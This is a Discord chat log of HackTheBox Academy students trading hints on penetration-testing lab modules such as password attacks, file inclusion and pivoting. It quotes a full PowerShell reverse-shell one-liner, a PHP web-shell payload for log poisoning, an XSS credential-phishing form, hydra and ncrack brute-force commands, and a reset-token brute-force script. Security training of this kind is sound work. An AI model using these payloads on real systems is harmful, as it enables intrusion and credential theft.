#modules

1 messages ยท Page 59 of 1

graceful parrot
#

Us1nG_

jaunty lodge
#

greetings guys....

rustic sage
#

Hello for the Password Attack Lab - Hard, I successfully got the VHD and the password of it

#

however, how do i mount the vhd file?

#

I found the links from the HTB forum but seems like it does not work for me

#

๐Ÿ˜ฆ

tiny ember
#

anyone who is using ubuntu 20.x and installed metasploit-framework via snap know how to install new plugins (due to the snap directories being read-only)?

rustic sage
#

@fathom pendant Can I DM you?

jaunty lodge
#

someone know where can i download the xfreerdp??? i tied to install from sudo apt-get install xfreerdp and don't locatr the package

#

๐Ÿ˜ฉ

jaunty lodge
tiny ember
#

๐Ÿ‘

#

i just bought the .net and .org of lmchatgptfy ๐Ÿคฃ

fathom pendant
rustic sage
fathom pendant
#

Either windows VM or if your host system is windows...

iron plaza
#

Did anyone finish the Linux Privilege Escalation - Miscellaneous Techniques? I need a bit of guidance in that section as I am unable to understand the concept in "Weak NFS Privileges"

tender yarrow
#

Morning all, I am new to Discord, not entirely sure how to use it ๐Ÿ™‚ I am completely stuck on the bug bounty path. I cannot get the OWASP ZAP HUD to work! When I try to toggle the break feature it simply will not toggle to On, it is like the button just does not work. I have contacted support who are useless! Any ideas please?

fathom pendant
#

First: don't say support is useless;
Second: what module are you having issues with specifically, what version of ZAP are you running

tender yarrow
#

the module is using web proxies, the version of ZAP is the version installed on the pwn box. May I ask why not to call support useless? On this occasion, support pretty much dismissed my query like I was useless! Therefore my experience was not good! I am paying for a service and I feel the support is sub standard!

novel matrix
cobalt pine
#

Hi Guys. I'm struggling with the last Question i FUZZ Webapplication. I've have created my ids.txt file - and trying to get the answer.
Using the Parrot PC in HTB - is unuseable for my view. (some language/settings are really bad) when trying to use the online Parrot Version - So doing from a VM from home
The Results I'm having, I have either all or none of the Ids, and can not see /figure out how this should be solved.
So I looked in the cheat sheet - and verified that my command are the right one - and it is correct as I can see - But again getting all 1000 answer back or none. So i cannot not figure out this last command
ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'KEYID=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -ft '<1000' which is the only difference in the 1000numbers in the output - Which gives me 10-20 number - but none of those are correct - so here I'm lost since I only see difference is Duration.
PS - interested in the right command to see differnece in this ? not the solution

cobalt pine
austere gulch
#

i hate my phoneFeelsBadMan

cobalt pine
sinful olive
#

MODULE: PIVOTING, TUNNELING, AND PORT FORWARDING skills assessment

Hi guys I found the vfrank creds and was able to connect to the other win machine with them, but I can only see the same flags..
Any help? Can I DM someone?

placid quest
#

@sinful olive yes

primal silo
#

try to fetch upload.php and read it.. understand the whole php file how the uploaded file is being saved and what filters are in place

#

everything you have read so far in the module is useful for the assessment apply everything

#

read content type filter section again

#

and apply that in the skill assessment you will get it

#

and don't get frustrated it took me 4 hours..

cobalt pine
# cobalt pine Thanks - Since it was the parameter was found at USER (so the brain got stucked ...

Well -still a bit struck here with these final flag - in the Module Fuzz Webapplications. so here its what I've done so far - after getting the right param and key.
The HINT - well its says its a flag in the HBT{VALUE} - reading the question - I thought the flag the would be in that response - when assigning the right param/key
Curl the admin.php with the right Param/keys --> Show same code as the webpage - but no flag her. and index shows 0byte in content.
My Scan for folders - didn't show any other folders than http://admin.academy.htb:PORT/admin/ --> no subfolders
A scan for extensions - shows for extension .phtml .html .htm .phps .php - but not found others than php
Did a discovery with directory-listening-2.3-big.txt & diretory-listening-2.3-lowercases-big.txt - only showing --> only showing admin.php and index.php. and index.php is empty
Did a recursion scan after flag - but didn't show anything else than index.php admin.php - Hmmm I Just can see what I'm missing here or where to find this flag here

primal silo
#

XD

cobalt pine
#

Hey Guys - any point direction would be well appreciated - since I can not figure out where the final flag are - The instructions/final question is that I should curl the answer But I'm just getting source - but I Can't figure this one

#

It'll be section 505 - where the wqustion are: Try to create the 'ids.txt' wordlist, identify the accepted value with a fuzzing scan, and then use it in a 'POST' request with 'curl' to collect the flag. What is the content of the flag?

versed lichen
#

Hi, I am just doing skill assasment "Password Attacks - Easy Lab" and I can't get into ftp. Nmap shows 2 services on the host (ftp and ssh). I did password mutation based on the list and rules provided in the module resources. Crackmapexec can't find anything, and bruteforce hydra takes ages (even after filtering out passwords that have less than 9 characters). Please give me some guidance.

cobalt pine
#

yes - Getting it decapriated in browser - ann in the curl

versed lichen
#

So u are saying that such command should work?
ncrack -U /home/kali/username.list -P /home/kali/unique_long_passwords.txt -T 5 ftp://<ip>

cobalt pine
#

in both Browser and curl - the only thing I can see it index and admin.php - but nothing in the index - and in admin.php - a ping show the right IP to look and the port is also up.
Have tried from both Mac and VM getting the same page - and have spawn the machine several the server a couple of times

Found thge name as USER yesterday - and had a hell today until where you talked about lowercase instead of the USER i Found Yesterday

versed lichen
#

Hmm it seems it didn't found anything ://

#

It'd be too easy and obvious but... let me try

#

It require user & pass

#

yup

#

So do you have any other ideas?

austere gulch
#

what about
ncrack -p 22 --user <username_list> -P <password_list> <target_ip>

versed lichen
#

Yes, im using mutaded pass list with username list provided in module resources

#

i did nmap -p- so i don't think there is something else

tender yarrow
# autumn pilot seems to be working

it defo isnt working, I am talking about the HUD that overlays a webpage and it has buttons on the left and buttons on the right. The green off button just will not turn to on. Do support not open at the weekend? They are not replying to my query, if they are closes then thats why.

autumn pilot
#

not sure what you are meaning, but can you take a screenshot

proud pine
tender yarrow
proud pine
#

It's really just a slower way to do what you can already do through ZAP itself, and will clutter up requests. If you already understand how to do the same methods from just within ZAP, then you're not really 'cutting corners'.

#

and I say this as someone who exclusively uses ZAP, instead of burp.

tender yarrow
proud pine
flat oxide
#

Anyone for this?

signal vine
austere gulch
#

to determine the FQDN of a third vhost, you would need to know the specific domain or server configuration

austere gulch
#

you can typically look at the URL. for example
if the URL of the website is "www.123.com", then the FQDN would be "www.123.com".

lucid veldt
#

I need a hint on AD Enumeration & Attacks - Skills Assessment Part I, has anyone finished this?

manic bough
#

So I've looked through the history in chat here because I have the same issue regarding the Nessus Skills Assessment, and all I can say is from the results is that this module is complete shit. What do you do to login to Nessus?

here's the instructions,
Once logged in, perform a BASIC NETWORK SCAN (modify the scan template to scan ALL ports, leave all other options the same) against the target: 172.16.16.100. Additionally, set up the scan to be authenticated using administrator:Academy_VA_adm1! as the credentials.

Authenticate to 10.129.202.116 with user "htb-student" and password "HTB_@cademy_student!"
What is the name of one of the accessible SMB shares from the authenticated Windows scan? (One word)

As you can see in the screenshots, nessus is not on the 10.x~ box, and I cannot connect to it from either a spawned instance or my box with vpn

vital adder
vale crescent
#

Hey is there anyone self learning cybersecurity without any degree?

vale crescent
analog tendon
vale crescent
#

Mmm I'm just thinking about learning things for free

analog tendon
#

Tier 0 modules are free and there are free rooms on THM. but youre gonna want to get a cert of some sort and to go through that is going to cost something. youtube university is good but not this good

dusty timber
#

htb is way harder and not as newbie friendly

#

@analog tendon how did you manage to get your "Academy user" role? ๐Ÿค” I cant find it in the academy site

winged zodiac
#

Hey I was at Attack SAM section of the Password Attack modules I was trying to transfer the system.save file via imapcket's smbserver.py but it says it failed, but rest of the two security.save and sam.save were transferred easily since they were small in size any alternatives

pliant flame
#

good evening. attacking common services easy challenge. I got a username through smtp-user-enum tried hydra on all open ports. used the pw list of the resource tab and rockyou.
is brute forcing a pw the correct next step, and if so should i get a hit with hydra when i specify the username as f**** and the pw list rockyou on ftp?
thanks in advance.

analog tendon
dusty timber
analog tendon
dusty timber
analog tendon
dusty timber
#

Glorious tax returns, maybe thats where I'll get my funding too lol

analog tendon
#

I seem to be stuck on the Passwd, Shadow & Opasswd section. I dont know if im going in the right direction or what the next move is. I found some ssh keys in one of the users hidden directories but these keys have a password and i cant seem to find that password. anyone know where to go from here?

crude vessel
#

Hello again people, i was doing the Password attacks Hard lab module but still having stuck with trying to hack Johanna's pwd (mut_password) and still having no results. Please can you give me a hint of how I need to start? I'd follow all steps to get results but in the last step the machine doesn't match any result or shut down cuz the time of indexation it's too long.

autumn pilot
#

the password for that user is rather easy and can be found in the list you mentioned

fathom pendant
analog tendon
fathom pendant
#

Maybe that user has those bak files in a different directory

analog tendon
#

ill look ito that next. thanks for the nudge

#

omg i shouldve looked at that. i did see she went there in the bash_history

crude vessel
autumn pilot
#

Give yourself a break, come back and re-think if you can approach it differently or if there is something that you are not doing correctly, not every time (every exercise) the commands are exact the same

crude vessel
#

maybe that works

#

thanks

static roost
#

In the Web Attacks module, Advanced File Disclosure section, I'm struggling to understand HOW the error method works. Can anyone explain this in detail?

autumn pilot
#

Basically, you will trigger the first XXE that will load the file (.dtd) that you are hosting which contains again XXE code, in the email field that you can manipulate you are calling the entity from your .dtd file which will execute the code

worn lodge
#

Hi Iam new can someone help me to know about server ..

autumn pilot
#

oh sorry, you mentioned error method

#

for the error method if you focus your attention to the local dtd file think of it like it will execute from last to first

turbid kindle
#

Hey everyone, I'm stucked at the File Inclusion Skills Assessment, I have found the ||access.log|| file but can't upload the php code to get command execution, can someone please help?

wooden totem
#

@everyone hey guys

solemn vector
#

Hi, I'm stuck on the "Attacking Common Applications - Attacking GitLab" module, I only have the user to find... the enumeration script works, it finds me 5 users, but not the one requested :/.

#

also, the given address (gitlab.inlanefreight.local) redirect to port 8180, while the gitlab is on port 8081, I don't know if it's supposed to be the case or if it's a mistake ^^

red current
#

I'm on module 147 section 1327. It's the Password Attacks / Network Services section. I've answered the first 3 questions but I'm stuck on the last one. It's the SMB service. I've tried both Hydra and Metasploit. I can't seem to find the right username and password. Has anyone had an issue with this question?

analog tendon
red current
analog tendon
red current
safe leaf
#

Anyone who can help me with skills assessment on file upload attacks?

#

Pretty stuck on trying to get an initial footing, I'm not sure where my upload files go or how to figure that out. I did find the javascript code sending to upload.php, but not sure how that helps. I've tried to use a SVG / XXE payload to view the source to get the location, but unsure how to get make the payload work without being able to view the image. I wiped out the javascript/html error checking to push an SVG in, but I get an internal server error when I do that. Could presumably start trying to play with other types of attacks, but without knowing where the images are stored, even if successful I don't know how to execute them

reef estuary
#

Greetings everyone,

As a subscribed member of HackTheBox, I am an experienced SOC analyst seeking to enhance my abilities. After exploring the website, I am curious to know if HackTheBox offers any blue team content. Thank you for your time.

analog tendon
prisma knot
#

When popping up the Impacket smbserver for the file transfers module - I'm not sure where this share is created. I run the command "sudo impacket-smbserver share -smb2support /tmp/smbshare" in the same working directory as I have the file I want to move, and then on the windows target I run "copy \<attacker_ip>\share<file_name>" and it gives me an error that the file was not found. Anyone know where the file to move needs to be located on the attack machine for the target to be able to grab it?

fathom pendant
#

also blocking your code between `` like this will keep it from removing some of your \

#

because i take it you put copy \\attackerip\share\filename

prisma knot
#

Yeah thanks for that info

#

Ill try that

fathom pendant
#

so if the file isn't in the /tmp/smbshare directory it's not found

#

you can create the smbshare in any directory with /path/to/folder or ./ which tells it to do it in this directory

paper geyser
#

How do you get started?

red obsidianBOT
prisma knot
#

@fathom pendant Now with the smbshare created, I dont see anything within /tmp called smbshare, will I not see it?

fathom pendant
#

then it's probably not a directory there

#

that's why (for practice) just do it in the local folder you have the file you want to transfer

prisma knot
#

Ah i see, the folder needs to be pre-existing, didnt catch that part. Thank you

fathom pendant
#

and the file also needs to exist in that folder

#

:)

prisma knot
#

Got it - thanks again!

dim wigeon
#

can i get help with smbclient and how to get the password.
i type in

"smbclient -U bob \ip\users

Enter workgroup\bob's password:

then what do i do next
If I press enter:
"session setup failed:NT_status_logon_failure

Getting started: Service Scanning

prisma knot
#

Try specifying the IP before the Username - smbclient \\\\<ip_address>\\$share -U <username>

fathom pendant
#

that's not the issue

dim wigeon
#

the issue is what do i type in or even get to a point I can type in smb:> ls

#

if I press enter It gives a logon failure

livid zephyr
#

module: Footprinting , footprinting lab-easy . two questions, one, I tried different wordlists to brute-force the ftp credentials but all of them failed. So ended up using the hint. DId anyone was able to brute force this?. Question2, I had tried to access the ftp servers both port 21, port 2121 and without indicating port, but I can't run any cmds on it. I get the following : Does anyone knows how to bypass it.

dim wigeon
#

so do I look at module footprinting?

prisma knot
#

what are you putting in for Bobs password?

dim wigeon
#

The issue is I can't type anything it doesn't allow me to input anything for some reason

prisma knot
#

If you start typing a password when it asks you for the password - it wont show you actually typing in the password. Just type it in and hit enter

livid zephyr
#

module: Footprinting , footprinting lab-easy . two questions, one, I tried different wordlists to brute-force the ftp credentials but all of them failed. So ended up using the hint. DId anyone was able to brute force this?. Question2, I had tried to access the ftp servers both port 21, port 2121 and without indicating port, but I can't run any cmds on it. I get the following : Does anyone knows how to bypass it.

prisma knot
#

@dim wigeon that work for you?

turbid kindle
dim wigeon
#

Also thank Kraxxten btw for helping.

dim wigeon
#

Im talking to people from HTB now and Ill see what they say

turbid kindle
#

I may have an answer for you

#

If you still need it contact me in DM

dim wigeon
fathom pendant
dim wigeon
#

Nope. You are supposed to acquire it and get through a file

#

That module. Last questeion.

turbid kindle
fathom pendant
#

look for the green text

turbid kindle
fathom pendant
#

i haven't done file inclusions

turbid kindle
#

Ok thanks anyway

dim wigeon
nocturne grove
#

sup guys. can anyone tell me what is exactly the "lab exercise guidance" on the silver annual subscription

analog tendon
#

Anyone assist with this pass the hash. last question getting a reverse shell from DC01 to MS01. ive gotten the command for the powershell to send the shell and respond as expected but my listener doesnt show a connection. ive verified im using the internal IP. verified the ports. have the listener running constantly and ive used the different versions of the powershell reverse payload using base64 encoding

analog tendon
nocturne grove
#

ooh thanks... I was thinking it would be kinda a individual help they'd provide

analog tendon
#

but sometimes its faster to ask some people who have already been through it

#

not everytime jsut sometimes

nocturne grove
#

do you know if any of the monthly subscriptions comes with direct access to all tier 2 modules?

#

or just the student subscription

fathom pendant
#

silver annual

#

but no monthly

analog tendon
#

monthly uses cubes

#

so al a carte

nocturne grove
#

that silver annual is too expensive to my wallet lol

analog tendon
#

expensive. yes. worth it? depends on how you look at it but i say yes

nocturne grove
#

dont know if it is actually worthy it

fathom pendant
#

silver annual also gives you a ticket for an attempt at the exam

nocturne grove
#

I mean ... maybe it is better to invest on cubes and the certification separately

analog tendon
#

annual also comes with a voucher for an exam

#

it can be depending on how long it takes you to get through the course

#

i have a life and kids so i cant always go through this stuff so having a whole year to be able to go through works for me

turbid kindle
midnight prawn
#

Hey all. I'm working on the sqlmap module's skills assessment and I'm a bit confused. As far as I can tell, there aren't any forms or other inputs that actually process input data, just a bunch of dummy forms. Am I on the wrong track or just missing something obvious?

analog tendon
brisk geode
turbid kindle
turbid kindle
#

Thanks

nocturne grove
#

I think i will go for one of the montly sub and buy a exam ticket separately :/

fathom pendant
#

you can also just buy cubes

#

instead of pay monthly

nocturne grove
#

yeah

fathom pendant
#

ยฏ_(ใƒ„)_/ยฏ

analog tendon
nocturne grove
#

but it would be more expensive ... i can use subscription while I do all of the pentest path and then cancel the sub if i wont do any other course

analog tendon
#

yea. i considered it myself but figured annual would be better for me. plus tax returns helped me alot

nocturne grove
#

yeah... anyway.. thank u guys. I will give it a lit bit more of thinking

#

get back tou you when ive decided

#

who knows i get a financial aid from my company lol

brisk geode
#

or

#

specifically the command youre using

analog tendon
#

after loading the Invoke-TheHash module i used the Invoke-SMBExec <target info> then this command from the reverse shell generator

#

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("172.16.1.5",8001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

#

of course base64 encoded and ive tried just about every flavor

#

i would have pasted the actual command but time ran out so my connection closed

brisk geode
#

are u using invoke-wmiexec?

analog tendon
#

WMIExec doesnt go through

brisk geode
#

is this the server for that? 12_ore

fathom pendant
#

Unfortunately nothing we can do homeslice just make a new account

#

Or contact Spotify support

brisk geode
analog tendon
turbid kindle
analog tendon
turbid kindle
#

In the second I get "invalid input detected" but haven't tried all the bypasses from the lessons

brisk geode
#

dm me if u cant get it

brisk geode
analog tendon
#

the Invoke-WMIExec?

#

or the reverse shell

#

ive tried with 4 different reverse shells

#

all powershell though

fringe veldt
#

Yes, I have done this. I was using port 443, since it is a commonly used port. Maybe ill try using other ports?

brisk geode
brisk geode
#

try the /proc/self/environ from there tho u need to change things a bit

brisk geode
#

dm me if u cant figure it out

analog tendon
#

i got it. and im about to punch my monitor for missing something so small

turbid kindle
analog tendon
#

i didnt put the command in the " "

brisk geode
brisk geode
analog tendon
#

i know

#

usually i would think of it but for some reason it just slipped me. thanks though

brisk geode
#

i was stuck in a skill assessment for 6 hours cuz i missed a "&"

analog tendon
#

shiiiit

turbid kindle
# brisk geode yeah

But where do i put the actual command? right after the ||environ as in environ&cmd=id||

brisk geode
turbid kindle
#

Ok I'm on it

turbid kindle
balmy radish
#

Read through the section in the module relevant to your question again and you'll find the piece you are missing

fathom pendant
#

How about no

#

Fuckin Snapchat scammer

novel matrix
#

booted

midnight prawn
craggy forge
#

From where i can lear ethical hacking

red obsidianBOT
novel matrix
#

@craggy forge ^

brisk geode
lavish torrent
#

I saw the example online, some people use meterpreter> and I use msf>, I want to ask if it is not started with msfconsole?

rustic sage
#

lmao

rustic sage
#

meterpreter is a attack payload which provide a interactive shell ,

#

to the attacker from which to explore the target machine and execute code

lavish torrent
#

That is, if I get a reverse session now and I'm using it, then my shell will become a meterpreter and I can use the responding commands, right? @rustic sage

rustic sage
#

i hope u understand

lavish torrent
#

I think I get it, thank you very much for the explanation, it's really easy to understand! @rustic sage

rustic sage
fathom pendant
#

Let's try and keep this channel on-topic of the modules for htb academy

red obsidianBOT
fathom pendant
#

You have to verify your main htb account in #bot-commands to access it

lavish torrent
#

Yes, I'm still learning. There are just some details that I didn't thoroughly understand at the time of study. @rustic sage

rustic sage
#

What happens after you run mstsc.exe from the an elevated cmd prompt and then run


netstat -na | findstr /c:"3389โ€
digital pewter
#

Is there a process to submit (typically minor) issues with HTB Academy module content?

balmy radish
cunning drum
#

any hints on windows privilege escalation skills assessment II question 2? Escalate privileges to SYSTEM and submit the contents of the flag.txt file on the Administrator Desktop

lucid veldt
#

How can I move a file from Windows to my local system? python -m http.server doesn't work

cunning drum
#

xfreerdp /v:10.129.211.17 /u:'htb-student' /p:'HTB_@cademy_stdnt!' /drive:linux,/home/kali/ctf

lucid veldt
cunning drum
#

copy "\192.168.220.133\share\nc.exe"

proud pine
lucid veldt
subtle glen
#

im still stuck on the ||imap|| section of footprinting hard lab, im in||tom's email|| and there are ||4|| folders, i used ||A1 FETCH 1:* (FLAGS) and A1 UID FETCH 1:* (FLAGS) || they all either return an error on nothing, i have no clue what to do, is there a second community maybe? the forums didnt mention anything about it.
the only notable return was in ||inbox, a1 fetch 1:* (FLAGS) returns this 1 FETCH (FLAGS (\Seen)), i tried to A1 FETCH 2 body[] and it returned just errors|| i would appreciate it a lot if someone could help me a little

subtle glen
turbid tartan
#

use one of the rfc

#

thats what i did

lucid veldt
#

How do I log onto another computer in AD?

autumn pilot
#

PSRemoting?

low vine
#

Struggling on the really easy stuff as usual.
Broken Auth - Weak Brute Force Q2

It seems like we should be using a X-Forward 127.0.0.1 with the brute forcing thing....not understanding why this isnt working and what I might be missing in my understanding of whats wanted here.....seems very straight forward and obvious

#

headers = ||{"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36","X-Forwarded-For": "127.0.0.1"}||

low vine
#

Got it.....im dumb.......

drifting sequoia
#

guys can I run hack the box in windows ???

#

I am young

#

pls help me

autumn pilot
#

not recommend

#

especially for someone who is starting out

drifting sequoia
autumn pilot
#

preferably

drifting sequoia
#

But I cant do it ... my father will kill me

#

and I am interested to learn

forest shoal
# drifting sequoia and I am interested to learn
north ermine
#

Hi ! I am working on Windows Privilege Escalation Skills Assessment - Part I

I can't find a way to make the potato works, tried everything i could think of ! All the CLID found by my scripts failed

#

Can someone help me ? That's the first time I encounter this much issues with a potato

cunning drum
#

Please Help Me i need Help in Windows Privilege Escalation Skills Assessment - Part II

#

if Any one Completed This Module Please Dm me

#

๐Ÿฅน

turbid tartan
#

In the password Attacks Credential Hunting Linux i tried brute forcing every service with every username and password that is from the rescources list

#

but i cant get in

turbid tartan
#

what?

fathom pendant
turbid tartan
#

what am i doing wrong ?

#

or a hint

#

delete first 70k entries

autumn pilot
#

which section are you working on

turbid tartan
#

than it shouldnt e that long to brute force

#

this should help

fathom pendant
turbid tartan
#

oh or 17k my flaut

autumn pilot
#

or filter out words starting with 'B' and use them

turbid tartan
#

yeah it should start with a b

#

B

#

But coming back to my problem on credential hunting in linux: i cant get on the machine i brute forced every service but nothing is working. Maybe someone can push me in the right direction

autumn pilot
#

is that from ad enum and attacks module

fathom pendant
#

No

turbid tartan
#

no password attacks

fathom pendant
#

Pass attacks

fathom pendant
autumn pilot
#

have you checked the hint as well?

turbid tartan
#

no, i should try that

#

yeah i checked the hint but the credentials dont work

autumn pilot
#

Thats a password that you can mutate

fathom pendant
#

The hint is to help you make a narrower pw mut list

low vine
#

So again this seems to insanely easy to fuck up but here I am. Breaking Authentication - Predictable Reset Token

We are copying a linked cve which is (username+epochtime) encoded with md5 and submitted.

fathom pendant
#

But they exist within the large list

low vine
#

Like i dont get how I could spend this long doing this and just getting wrong answers

#

We have a time stamp.....

We have a converter to epoch time ......

We have md5 hash generator.....

We have somehow gotten the wrong answer.......

#

Vendor: The Apache Software Foundation

Versions Affected: Apache OpenMeetings 1.9.x - 3.1.0

Description:
The hash generated by the external password reset function is
generated by concatenating the user name and the current system time,
and then hashing it using MD5. This is highly predictable and can be
cracked in seconds by an attacker with knowledge of the user name of
an OpenMeetings user.

All users are recommended to upgrade to Apache OpenMeetings 3.1.1

Credit: This issue was identified by Andreas Lindh


Apache OpenMeetings Team```
turbid tartan
#

thanks guys that worked

low vine
lucid veldt
#

Has anyone finished AD Enumeration & Attacks - Skills Assessment Part I?

north ermine
calm abyss
#

Hello guys i am having a problem with this module
https://academy.hackthebox.com/module/31/section/390

When i try to run this command in the debugger
run $(python -c "print '\x55' * 1200")
I get this error

Starting program: /home/gem/bow32 $(python -c "print '\x55' * 1200")
File "<string>", line 1
print '\x55' * 1200
^^^^^^^^^^^^^^^^^^^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(...)?
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0xf7e1df2c in ?? () from /lib32/libc.so.6

This is because in Python3 print uses () and here is without but i cannot find a workaround...
Can you help

spiral pelican
#

Hi all
I tried to complete the skills assessment in the pivoting,tunneling module
I am stuck after getting the lsass file and discover the user v**** but impossible to crack the hash with classics wordlists.
I discover the second server with the IP 172.16.6.* but impossible to log in rdp with mlefay (and in dont have the v*** 's password ^^)
I also tried to set a netsh on the first windows srv but nothing workโ€ฆ
Please if someone can help me it will be very apreciate ๐Ÿ™‚

Thanks

fathom pendant
spiral pelican
fathom pendant
#

The v*, you dumped the lsass/secrets yeah?

spiral pelican
#

yes

#

i found a NT hash but impossible to crack

#

i dump manualy the lsass and read it with pypykatz

#

oh damn !!!!!!

lucid veldt
spiral pelican
spiral pelican
low vine
#

Most frustrating thing in the world to have what needs to be done explained and then you follow it and are told you're wrong

rustic sage
#

aaha

livid bluff
#

Hi,
I think i have a problem with the password mutation section in password attacks module.
I created the mutation of the word list but since this morning it is running, I had to restart the machine many times.
There is no complexity at this level and i use the lists given in the resources
Here are my commands:

hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list

hydra -l sam -P mut_password.list 10.129.128.227 ssh -t 4

I lost another whole day for nothing on brute force...
rustic sage
#

-t 4 is default , u dont have to use this default value i would say

livid bluff
#

Ok thanks I restarted without this option but I'm afraid the server will stop the connection for too many bad attempts

rustic sage
#

no no -t 4 is decent

#

and server is powerfull enough

#

server can handle request

livid bluff
rustic sage
#

can anyone provide me the best worldist for subdomains enum?

livid bluff
#

Oh yes, sorry, I got confused with the nmap in the previous section ...
Well, I'll try again in ftp because yes it's too long in ssh.
It's really a problem to waste so much time for brute force or we learn nothing.

fathom pendant
#

Ssh is super slow and forces a 4 thread

livid bluff
sick warren
#

Academy - Windows Privilege Escalation - Pillaging
I'm having difficulties to submit the Administrator hash .. I restored the back up files and dumped hashes using samdump2 and got the administrator hash but whenever I submit it .. It's wrong

tidal mango
#

In the Documentation and Reporting Module, under resources these is a .ZIP file with a sample report. I either missed the password for it or it is not listed. When I go to unpack the zip it asks for a password. Can someone help me out with that password? Thank you!

winged zodiac
sick warren
#

but i want to know why ?

livid bluff
urban anvil
#

hi guys i am in "password attacks module : Attacking lssas " .. when i am using "pypykatz lsa minidump /home/htb-ac698971/lsass.dmp" it says bash command not found. I tried installing pypykatz it gives a lot of error. Can someone help me?

autumn pilot
#

what kind of an error are you getting when you try to install it

urban anvil
patent mural
#

hey guys idk how to conect wifi to my workstacion i cant open firefox

autumn pilot
#

if you are a free user, then you don't have access to the internet on the workstation

peak hamlet
#

Hi folks, last couple of times whenever i spawn target machine, it generates some random pub IP with a special port, is this new change or what? i cannot ping it or access it

autumn pilot
#

thats a docker target which can be accessed over the internet, you need to think of a better approach than to ping it

restive zephyr
low vine
#

I cannot get a valid return and dont have any idea why

#

would love some help if possible

#
import requests
from sys import exit
from time import time
import datetime

url = "http://<IP>/question1/"


   
now = int(861000)
start_time = now
fail_text = "Wrong token"
user="htbadmin"
endtime=now+1500

for x in range(start_time-1500, endtime):
    raw_data = user+str(x)
    md5_token = md5(str(raw_data).encode()).hexdigest()
    data ={"token":md5_token,"submit":"check"}

    print("checking {} {}".format(str(x), md5_token))

    res = requests.post(url, data=data)

    if not fail_text in res.text:
        print(res.text)
        print("[*] Congratulations! raw reply printed before")
        exit()


exit()```
#

(6 hours on this single question) Have read throug hthe Broken Auth thread and still no juice

valid nest
#

Thanks. Spent about an hour on this, but with your comments, i knock it out in five secods.

cerulean crow
#

You ever figure this out?

rain agate
#

hey guys where is the password for Kerberoasting module

#

i have not been able to login with GetUserSPN

fathom pendant
#

The password file comes in handy in a later section

cerulean crow
fathom pendant
#

Not at my computer ATM, but which file do you mean? The password.list from the resources?

cerulean crow
#

No worries, I meant the mutated password list

rustic sage
#

Hello can i ask a question regarding XSS Phishing module?

#

I am using this xss payload provided from the module

#
document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');
#

however i kept getting ');'> at this end

#

is there any problem with this?

fathom pendant
dim wolf
rustic sage
stiff moon
#

yo in Attacking Enterprise Networks

i need some help

on the Active Directory Compromise part.

having problems with a tool. need help asap ๐Ÿ˜‹ ๐Ÿ™ˆ

#

nvm got it

#

got a workaround

jaunty vigil
#

anyone can help me out on the osticket part of the attacking common apps module?

#

idk why the exploit chain just not clicking for me

#

idk what they are looking for here

low vine
#

No

#

It runs but it doesn't stop/ find anything

#

Driving me nuts

sly tapir
low vine
#

Yea

fathom pendant
#

Don't just ping people randomly dude

jaunty vigil
#

๐Ÿ‘

fathom pendant
#

Depending on how long you've been working on it take a step away and come back later

jaunty vigil
#

i can't tell if it really wants me to dehashed.com inlanefreight.local or not

calm gull
#

Hey all, thoroughly enjoying the penetration tester path. Canโ€™t imagine a better education. I had a question on โ€œAttacking Common Servicesโ€ module, โ€œAttacking RDPโ€ section for anyone who knows the answer. For a PtH attack, is it possible to enable Restricted Admin Mode before gaining access to the victim host in any way? Or is it only something done after, using an alternative protocol like SSH, etc and then RDPing over ๐Ÿ™๐Ÿผ

jaunty vigil
#

si

#

from my understanding as long as you have some RCE enabled you can do it

#

you don't need a shell or a login

#

could be enabled through a webshell

foggy light
#

Password Attack : Lab Medium
I just cracked the password of the docx file, How do i open the file in my linux box with that information?

graceful mortar
#

on pwnbox i dont know

deft escarp
#

Footprinting module lab easy. || ive connect to the ssh server with the provaye key i got off the ftp server, but I cant find the flag.txt on the ssh server and ls, dir, etc. Return nothing||

#

Nvm

#

Found it

foggy light
#

wow.. All this time I thought i had libreoffice in my vm, it was actually never there and no file will open

graceful mortar
#

hahaha

#

you need get it on kali linux

foggy light
#

dude... all this time

#

yea .. i thought it comes by default with kali

graceful mortar
#

sudo apt update
sudo apt install libreoffice

foggy light
#

yea just installed it. thanks

deft escarp
#

Can someone tell me a story about how they were doing good then suddenly came up against a wall and felt like they were stupid for having to use hints or ask on discord often then eventually became better and is now an op l33t h@x0r?

cunning marsh
#

ask me next year

simple zephyr
#

I am having a ton of trouble with the final assessment for File Inclusion / Skill Assessment

I am attempting to poison the logs in burp and can see that I can write a user-agent, but after that when I go to put this into the user agent.

||<?php system($_GET["cmd"]); ?>||

and this for my get statement

||```
GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log&cmd=id


Nothing shows up
jaunty vigil
#

play aroudn with your quotes ont he payload it breaks it sometimes.

simple zephyr
jaunty vigil
#

quote the entire thing

#

look at how the useragent is being logged

simple zephyr
#

Ok thanks

#

Cooking dinner now lol get that after

dapper temple
graceful mortar
#

im trying to crack johanna password in passwords attacks lab hard but i never get it. what am i doing wrong?

static roost
#

So I'm trying to figure out WHY I am able to issue commands via an anonymous bind through rpcclient. I have a Windows 2016 VM spun up. On the VM I can NOT issue any commands; I get "result was NT_STATUS_ACCESS_DENIED". I already asked chatgpt and found a couple GPOs that may restrict commands over anonymous binds, but NONE of them are enabled or even configured on the VM. So my questions is: Does anyone know the exact GPO/setting on Windows Server 2016 that allows one to authenticate anonymously, but restricts issuing commands?

simple zephyr
